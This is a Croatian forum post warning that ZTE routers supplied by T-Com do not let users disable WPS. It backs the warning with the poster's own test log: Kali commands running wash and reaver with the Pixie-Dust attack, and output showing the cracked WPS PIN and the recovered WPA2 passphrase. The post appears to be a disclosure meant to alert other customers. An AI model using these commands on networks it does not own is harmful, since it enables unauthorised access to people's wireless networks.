PC Ekspert Forum - View Single Post - ZTE ZXDSL 931VII (t-com)

Stručnjak · 24.12.2016., 13:56

Ne mogu poslati SS jer nakon što tehničar nije mogao isključiti WPS pošto nije pronašao tu opciju, na moj zahtjev, dobio sam Speedport u zamjenu. Niže je protokol testiranja sigurnosti mojeg ZTE routera na WPS sa probijenim PIN-om i WPA2/AES passwordom (na dnu boldano).
Naime, navedeni router sam dobio prije mjesec dana jer sam prešao na 100 Mbit optiku.
Da ponovim, na navedenom routeru uz najnoviji firmware, nije moguće isključiti WPS. Na protokolu sam BSSID i ESSID zbog privatnosti zamijenio sa "x".
Ako ti na svojem routeru imaš opciju isključenja WPS-a, ovaj post se ne odnosi na tebe već je upozorenje za sve koji su nedavno dobili ZTE.
Znam samo da mi je susjed također dobio optiku i njegov WPS je također aktivan.
-----------------------------------------------------------------------------------------------
root@kali:~# wash -i mon0

Wash v1.5.2 WiFi Protected Setup Scan Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x & DataHead & Soxrok2212

BSSID Channel RSSI WPS Version WPS Locked ESSID
---------------------------------------------------------------------------------------------------------------
xx:xx:xx:xx:xx:xx 2 -41 1.0 No xxxxxx

^C
root@kali:~# reaver -c 2 -i mon0 -b xx:xx:xx:xx:xx:xx -vv -K 1

Reaver v1.5.2 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner
mod by t6_x & DataHead & Soxrok2212

[+] Switching mon0 to channel 2
[+] Waiting for beacon from xx:xx:xx:xx:xx:xx
[+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxx)
[+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000
[+] Trying pin 12345670.
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[P] E-Nonce: 7c:d1:48:e0:07:7a:1b:f6:2f:d0:56:e4:e7:ab:e3:a1
[P] PKE: c5:7a:18:62:dc:0f:2a:4c:82:b9:57:3f:e8:27:31:1b:eb:75:45:d6:c6:14:f4:eb:4f:b8:57:dd:1b:09:b1:6c:01:e8:7e:b1:86:a2:1c:66:e1:20:c7:16:86:b5:64:07:51:1
c:a8:ce:3f:76:f8:ff:b8:8a:bc:19:ff:85:58:6f:13:36:ff:59:41:a5:65:d2:2c:97:9a:71:36:7a:97:b9:e5:f3:58:2d:56:fc:16:65:87:75:fb:8c:32:36:86:19:1e:f6:e3:91:16:
af:96:7e:68:2e:2f:9f:72:68:b1:f7:29:16:48:dd:4c:4e:28:0b:ee:b5:1b:45:b3:c8:d6:45:0f:7e:20:b3:34:73:23:79:72:0c:2f:68:e0:6c:87:a1:04:a2:55:61:50:f6:f4:84:
14:7b:52:82:9a:0b:27:06:76:ea:6b:b4:13:94:6a:6b:43:dd:3b:8f:44:34:e0:0e:ef:7d:fa:df:db:83:77:5a:d9:a3:02:44:c3:89:23:8c
[P] WPS Manufacturer: ZTE
[P] WPS Model Name: ZXHN H367N
[P] WPS Model Number: V1.0
[P] Access Point Serial Number: 12345678
[+] Received M1 message
[P] R-Nonce: 16:de:e8:fa:19:25:5f:13:3b:45:0d:75:ce:e9:e7:a7
[P] PKR: f6:97:17:9f:8a:d5:59:68:24:e9:f3:68:1a:18:80:4f:34:cc:b4:ab:a9:3f:31:d4:c3:c0:f0:f9:34:09:d8:d4:ed:92:d0:ff:53:22:3e:0f:6e:40:03:2d:bc:95:f9:8d:c6:
1a:b6:e5:1c:67:7f:8f:d9:f7:f4:02:20:84:b1:cc:6e:1c:00:04:31:7c:b9:4f:cb:82:11:28:4d:79:3a:80:c1:97:80:ee:ff:56:ce:24:5f:ba:6c:59:eb:07:44:c0:84:c0:7d:a8:f2:
1e:a5:14:f9:8c:52:80:a7:31:b5:62:4d:f6:b8:a0:85:0e:9f:3a:06:ca:58:e0:df:a3:f2:4a:44:c8:60:0f:4d:f6:28:7e:68:0d:af:81:82:bf:54:aa:23:97:4a:34:45:e7:a1:d2:27:
32:6c:4e:db:48:c4:d0:34:9e:35:01:9b:d9:2b:21:68:f5:ec:e8:d9:16:96:88:c4:d4:5e:a4:22:d1:7b:7a:ed:ad:69:d9:5d:05:fb:7b
[P] AuthKey: 08:4f:c3:96:90:80:f4:c7:97:eb:85:5e:12:1f:78:5c:f8:90:d6:6f:34:73:fd:2c:d8:34:0b:d6:4a:29:6d:1e
[+] Sending M2 message
[P] E-Hash1: 8c:70:d6:c4:d3:45:47:6e:d4:fb:e9:1c:f3:fe:13:b4:4b:8c:35:e6:53:51:a4:4c:bc:e5:d0:d8:08:6d:f0:1b
[P] E-Hash2: 88:50:c2:21:f3:a3:a0:f2:e1:29:97:31:8f:a9:09:6b:da:9b:85:15:b7:c8:c4:da:7f:f1:bd:45:34:a8:f5:f7
[Pixie-Dust]
[Pixie-Dust] Pixiewps 1.2
[Pixie-Dust]
[Pixie-Dust] [*] Mode: 1 (RT/MT)
[Pixie-Dust] [*] PSK1: d0:d2:73:18:16:2d:d8:7f:ad:33:1d:8c:b0:8b:81:5b
[Pixie-Dust] [*] PSK2: 7a:5c:51:90:20:54:0c:8e:d7:0c:d4:60:8c:56:fa:67
[Pixie-Dust] [*] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [*] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00
[Pixie-Dust] [+] WPS pin: 60273468
[Pixie-Dust]
[Pixie-Dust] [*] Time taken: 0 s 97 ms
[Pixie-Dust]
Running reaver with the correct pin, wait ...
Cmd : reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 2 -s y -vv -p 60273468

[Reaver Test] BSSID: xx:xx:xx:xx:xx:xx
[Reaver Test] Channel: 2
[Reaver Test] [+] WPS PIN: '60273468'
[Reaver Test] [+] WPA PSK: '31qc8i4pgmcat6ht'
[Reaver Test] [+] AP SSID: ‘xxxxxx’
root@kali

24.12.2016., 13:56	#1247
Stručnjak Registered User Datum registracije: Dec 2016 Lokacija: Tunguzija Postovi: 10	Ne mogu poslati SS jer nakon što tehničar nije mogao isključiti WPS pošto nije pronašao tu opciju, na moj zahtjev, dobio sam Speedport u zamjenu. Niže je protokol testiranja sigurnosti mojeg ZTE routera na WPS sa probijenim PIN-om i WPA2/AES passwordom (na dnu boldano). Naime, navedeni router sam dobio prije mjesec dana jer sam prešao na 100 Mbit optiku. Da ponovim, na navedenom routeru uz najnoviji firmware, nije moguće isključiti WPS. Na protokolu sam BSSID i ESSID zbog privatnosti zamijenio sa "x". Ako ti na svojem routeru imaš opciju isključenja WPS-a, ovaj post se ne odnosi na tebe već je upozorenje za sve koji su nedavno dobili ZTE. Znam samo da mi je susjed također dobio optiku i njegov WPS je također aktivan. ----------------------------------------------------------------------------------------------- root@kali:~# wash -i mon0 Wash v1.5.2 WiFi Protected Setup Scan Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner mod by t6_x & DataHead & Soxrok2212 BSSID Channel RSSI WPS Version WPS Locked ESSID --------------------------------------------------------------------------------------------------------------- xx:xx:xx:xx:xx:xx 2 -41 1.0 No xxxxxx ^C root@kali:~# reaver -c 2 -i mon0 -b xx:xx:xx:xx:xx:xx -vv -K 1 Reaver v1.5.2 WiFi Protected Setup Attack Tool Copyright (c) 2011, Tactical Network Solutions, Craig Heffner mod by t6_x & DataHead & Soxrok2212 [+] Switching mon0 to channel 2 [+] Waiting for beacon from xx:xx:xx:xx:xx:xx [+] Associated with xx:xx:xx:xx:xx:xx (ESSID: xxxxxx) [+] Starting Cracking Session. Pin count: 0, Max pin attempts: 11000 [+] Trying pin 12345670. [+] Sending EAPOL START request [+] Received identity request [+] Sending identity response [P] E-Nonce: 7c:d1:48:e0:07:7a:1b:f6:2f:d0:56:e4:e7:ab:e3:a1 [P] PKE: c5:7a:18:62:dc:0f:2a:4c:82:b9:57:3f:e8:27:31:1b:eb:75:45:d6:c6:14:f4:eb:4f:b8:57:dd:1b:09:b1:6c:01:e8:7e:b1:86:a2:1c:66:e1:20:c7:16:86:b5:64:07:51:1 c:a8:ce:3f:76:f8:ff:b8:8a:bc:19:ff:85:58:6f:13:36:ff:59:41:a5:65:d2:2c:97:9a:71:36:7a:97:b9:e5:f3:58:2d:56:fc:16:65:87:75:fb:8c:32:36:86:19:1e:f6:e3:91:16: af:96:7e:68:2e:2f:9f:72:68:b1:f7:29:16:48:dd:4c:4e:28:0b:ee:b5:1b:45:b3:c8:d6:45:0f:7e:20:b3:34:73:23:79:72:0c:2f:68:e0:6c:87:a1:04:a2:55:61:50:f6:f4:84: 14:7b:52:82:9a:0b:27:06:76:ea:6b:b4:13:94:6a:6b:43:dd:3b:8f:44:34:e0:0e:ef:7d:fa:df:db:83:77:5a:d9:a3:02:44:c3:89:23:8c [P] WPS Manufacturer: ZTE [P] WPS Model Name: ZXHN H367N [P] WPS Model Number: V1.0 [P] Access Point Serial Number: 12345678 [+] Received M1 message [P] R-Nonce: 16:de:e8:fa:19:25:5f:13:3b:45:0d:75:ce:e9:e7:a7 [P] PKR: f6:97:17:9f:8a:d5:59:68:24:e9:f3:68:1a:18:80:4f:34:cc:b4:ab:a9:3f:31:d4:c3:c0:f0:f9:34:09:d8:d4:ed:92:d0:ff:53:22:3e:0f:6e:40:03:2d:bc:95:f9:8d:c6: 1a:b6:e5:1c:67:7f:8f:d9:f7:f4:02:20:84:b1:cc:6e:1c:00:04:31:7c:b9:4f:cb:82:11:28:4d:79:3a:80:c1:97:80:ee:ff:56:ce:24:5f:ba:6c:59:eb:07:44:c0:84:c0:7d:a8:f2: 1e:a5:14:f9:8c:52:80:a7:31:b5:62:4d:f6:b8:a0:85:0e:9f:3a:06:ca:58:e0:df:a3:f2:4a:44:c8:60:0f:4d:f6:28:7e:68:0d:af:81:82:bf:54:aa:23:97:4a:34:45:e7:a1:d2:27: 32:6c:4e:db:48:c4:d0:34:9e:35:01:9b:d9:2b:21:68:f5:ec:e8:d9:16:96:88:c4:d4:5e:a4:22:d1:7b:7a:ed:ad:69:d9:5d:05:fb:7b [P] AuthKey: 08:4f:c3:96:90:80:f4:c7:97:eb:85:5e:12:1f:78:5c:f8:90:d6:6f:34:73:fd:2c:d8:34:0b:d6:4a:29:6d:1e [+] Sending M2 message [P] E-Hash1: 8c:70:d6:c4:d3:45:47:6e:d4:fb:e9:1c:f3:fe:13:b4:4b:8c:35:e6:53:51:a4:4c:bc:e5:d0:d8:08:6d:f0:1b [P] E-Hash2: 88:50:c2:21:f3:a3:a0:f2:e1:29:97:31:8f:a9:09:6b:da:9b:85:15:b7:c8:c4:da:7f:f1:bd:45:34:a8:f5:f7 [Pixie-Dust] [Pixie-Dust] Pixiewps 1.2 [Pixie-Dust] [Pixie-Dust] [] Mode: 1 (RT/MT) [Pixie-Dust] [] PSK1: d0:d2:73:18:16:2d:d8:7f:ad:33:1d:8c:b0:8b:81:5b [Pixie-Dust] [] PSK2: 7a:5c:51:90:20:54:0c:8e:d7:0c:d4:60:8c:56:fa:67 [Pixie-Dust] [] E-S1: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [] E-S2: 00:00:00:00:00:00:00:00:00:00:00:00:00:00:00:00 [Pixie-Dust] [+] WPS pin: 60273468 [Pixie-Dust] [Pixie-Dust] [] Time taken: 0 s 97 ms [Pixie-Dust] Running reaver with the correct pin, wait ... Cmd : reaver -i mon0 -b xx:xx:xx:xx:xx:xx -c 2 -s y -vv -p 60273468 [Reaver Test] BSSID: xx:xx:xx:xx:xx:xx [Reaver Test] Channel: 2 [Reaver Test] [+] WPS PIN: '60273468' [Reaver Test] [+] WPA PSK: '31qc8i4pgmcat6ht' [Reaver Test] [+] AP SSID: ‘xxxxxx’ root@kali